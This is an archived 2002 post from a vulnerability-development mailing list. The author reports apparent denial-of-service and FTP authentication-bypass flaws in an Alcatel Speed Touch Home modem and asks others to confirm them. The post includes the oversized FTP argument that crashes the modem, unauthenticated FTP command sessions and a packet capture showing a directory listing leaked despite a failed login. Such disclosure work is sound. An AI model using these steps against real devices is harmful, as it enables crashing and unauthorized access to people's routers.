Vulnerability Development mailing list archives
Alcatel Speed Touch Modem problems.. or not? Anyone?
From: Strumpf Noir Society <vuln-dev () labs secureance com>
Date: Thu, 21 Feb 2002 15:09:21 +0100
Hi cats n' kittens,
I came across below, but Alcatel is unable to reproduce it they say.
I was wondering wether anyone out there could do a quick test and supply
me with some results to wave at them (if there indeed is an issue)? Below
was tested with a Speed Touch Home modem, which would make these
problems LAN/internal ones, but it is my understanding that the Speed
Touch Pro has an external ip as well, which could extend the possibilities
a bit :) Anyways, any feedback would be appreciated, on to the problem:
1) My Alcatel Speed Touch Home (GV8BAA3.253 - 997001) ADSL modem seems
unable to handle a large number of connections to its telnet daemon. About
10-20 quick concurrent connections will cause the modem to reboot.
2) The size of arguments passed through ftp commands to the ftp server
seems to be unchecked. This also allows someone to crash/reboot the modem:
$ ftp 10.0.0.138
Connected to 10.0.0.138.
220 Inactivity timer = 120 seconds. Use 'site idle <secs>' to change.
User (10.0.0.138:(none)): guest
331 SpeedTouch (xx-xx-xx-xx-xx-xx) User guest OK. Password required.
Password:
530 Invalid password
Login failed
ls aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Interesting part here is that even though the login fails, it appears
possible to pass the command to the server. It seems there is a problem
with the ftp daemons authentication scheme, below test would appear to
support that as well:
3) I have a sniffer running on the wire, listening for all traffic to and
from the box's internal ip 10.0.0.150. The modem has ip 10.0.0.138.
I log in with user/pass guest/guest, which are invalid for the modem.
$ ftp 10.0.0.138
Connected to 10.0.0.138.
220 Inactivity timer = 120 seconds. Use 'site idle <secs>' to change.
User (10.0.0.138:(none)): guest
331 SpeedTouch (xx-xx-xx-xx-xx-xx) User guest OK. Password required.
Password:
530 Invalid password
Login failed
ls
200 Connected to 10.0.0.150 port 2681
530 Unknown user
So far so good, I'm not allowed the listing, since I'm not properly logged
in. However, the packetlog (NGSSniff) reveals the following:
IP Header
Length and version: 0x45
Type of service: 0x00
Total length: 74
Identifier: 27510
Flags: 0x0000
TTL: 64
Protocol: 6 (TCP)
Checksum: 0xfa18
Source IP: 10.0.0.138
Dest IP: 10.0.0.150
TCP Header
Source port: 21
Dest port: 2675
Sequence: 3435584144
ack: 1451021190
Header length: 0x80
Flags: 0x18 (ACK PSH )
Window Size: 4096
Checksum: 0xb3ac
Urgent Pointer: 0
Raw Data
35 33 30 20 49 6e 76 61 6c 69 64 20 70 61 73 73 (530 Invalid pass)
77 6f 72 64 0d 0a (word )
IP Header
Length and version: 0x45
Type of service: 0x00
Total length: 76
Identifier: 58979
Flags: 0x0000
TTL: 64
Protocol: 6 (TCP)
Checksum: 0x7f29
Source IP: 10.0.0.150
Dest IP: 10.0.0.138
TCP Header
Source port: 2675
Dest port: 21
Sequence: 1451021190
ack: 3435584166
Header length: 0x80
Flags: 0x18 (ACK PSH )
Window Size: 64076
Checksum: 0x493d
Urgent Pointer: 0
Raw Data
50 4f 52 54 20 31 30 2c 30 2c 30 2c 31 35 30 2c (PORT 10,0,0,150,)
31 30 2c 31 31 36 0d 0a (10,116 )
IP Header
Length and version: 0x45
Type of service: 0x00
Total length: 91
Identifier: 27520
Flags: 0x0000
TTL: 64
Protocol: 6 (TCP)
Checksum: 0xf9fd
Source IP: 10.0.0.138
Dest IP: 10.0.0.150
TCP Header
Source port: 21
Dest port: 2675
Sequence: 3435584166
ack: 1451021214
Header length: 0x80
Flags: 0x18 (ACK PSH )
Window Size: 4096
Checksum: 0x31c4
Urgent Pointer: 0
Raw Data
32 30 30 20 43 6f 6e 6e 65 63 74 65 64 20 74 6f (200 Connected to)
20 31 30 2e 30 2e 30 2e 31 35 30 20 70 6f 72 74 ( 10.0.0.150 port)
20 32 36 37 36 0d 0a ( 2676 )
IP Header
Length and version: 0x45
Type of service: 0x00
Total length: 58
Identifier: 58992
Flags: 0x0000
TTL: 64
Protocol: 6 (TCP)
Checksum: 0x7f2e
Source IP: 10.0.0.150
Dest IP: 10.0.0.138
TCP Header
Source port: 2675
Dest port: 21
Sequence: 1451021214
ack: 3435584205
Header length: 0x80
Flags: 0x18 (ACK PSH )
Window Size: 64037
Checksum: 0xeac1
Urgent Pointer: 0
Raw Data
4e 4c 53 54 0d 0a (NLST )
IP Header
Length and version: 0x45
Type of service: 0x00
Total length: 70
Identifier: 27522
Flags: 0x0000
TTL: 64
Protocol: 6 (TCP)
Checksum: 0xfa10
Source IP: 10.0.0.138
Dest IP: 10.0.0.150
TCP Header
Source port: 21
Dest port: 2675
Sequence: 3435584205
ack: 1451021220
Header length: 0x80
Flags: 0x18 (ACK PSH )
Window Size: 4096
Checksum: 0x97b8
Urgent Pointer: 0
Raw Data
35 33 30 20 55 6e 6b 6e 6f 77 6e 20 75 73 65 72 (530 Unknown user)
0d 0a ( )
IP Header
Length and version: 0x45
Type of service: 0x00
Total length: 61
Identifier: 27523
Flags: 0x0000
TTL: 64
Protocol: 6 (TCP)
Checksum: 0xfa18
Source IP: 10.0.0.138
Dest IP: 10.0.0.150
TCP Header
Source port: 20
Dest port: 2676
Sequence: 3436864002
ack: 1453411572
Header length: 0x80
Flags: 0x18 (ACK PSH )
Window Size: 4096
Checksum: 0x12c8
Urgent Pointer: 0
Raw Data
74 6f 74 61 6c 20 31 0d 0a (total 1 )
IP Header
Length and version: 0x45
Type of service: 0x00
Total length: 101
Identifier: 27524
Flags: 0x0000
TTL: 64
Protocol: 6 (TCP)
Checksum: 0xf9ef
Source IP: 10.0.0.138
Dest IP: 10.0.0.150
TCP Header
Source port: 20
Dest port: 2676
Sequence: 3436864011
ack: 1453411572
Header length: 0x80
Flags: 0x19 (ACK PSH FIN )
Window Size: 4096
Checksum: 0xdff8
Urgent Pointer: 0
Raw Data
61 63 74 69 76 65 0d 0a 64 6c 0d 0a 73 74 61 72 (active dl star)
74 75 70 2e 63 6d 64 0d 0a 47 56 38 41 41 41 31 (tup.cmd GV8AAA1)
2e 30 30 30 0d 0a 6d 6f 75 6e 74 2e 63 6d 64 0d (.000 mount.cmd )
0a ( )
IP Header
Length and version: 0x45
Type of service: 0x00
Total length: 132
Identifier: 27525
Flags: 0x0000
TTL: 64
Protocol: 6 (TCP)
Checksum: 0xf9cf
Source IP: 10.0.0.138
Dest IP: 10.0.0.150
TCP Header
Source port: 21
Dest port: 2675
Sequence: 3435584205
ack: 1451021220
Header length: 0x80
Flags: 0x18 (ACK PSH )
Window Size: 4096
Checksum: 0xe525
Urgent Pointer: 0
Raw Data
35 33 30 20 55 6e 6b 6e 6f 77 6e 20 75 73 65 72 (530 Unknown user)
0d 0a 31 35 30 20 4f 70 65 6e 69 6e 67 20 64 61 ( 150 Opening da)
74 61 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 66 6f (ta connection fo)
72 20 2f 62 69 6e 2f 6c 73 0d 0a 32 32 36 20 30 (r /bin/ls 226 0)
20 6d 61 74 63 68 65 73 20 74 6f 74 61 6c 0d 0a ( matches total )
It seems the 'ls' is still executed anyways and that the ftp client (Win2k
ftp.exe) is just witholding the information from me in some way. Above IS
effectively a listing of my modems ftp "root".
Any thoughts/comments/similar (or different) results? Much obliged :)
Cheers,
Thejian
--
Best regards,
Strumpf Noir Society mailto:vuln-dev () labs secureance com
"Mere accumulation of observational evidence is not proof."
-- Death, "The Hogfather"
Current thread:
- Alcatel Speed Touch Modem problems.. or not? Anyone? Strumpf Noir Society (Feb 21)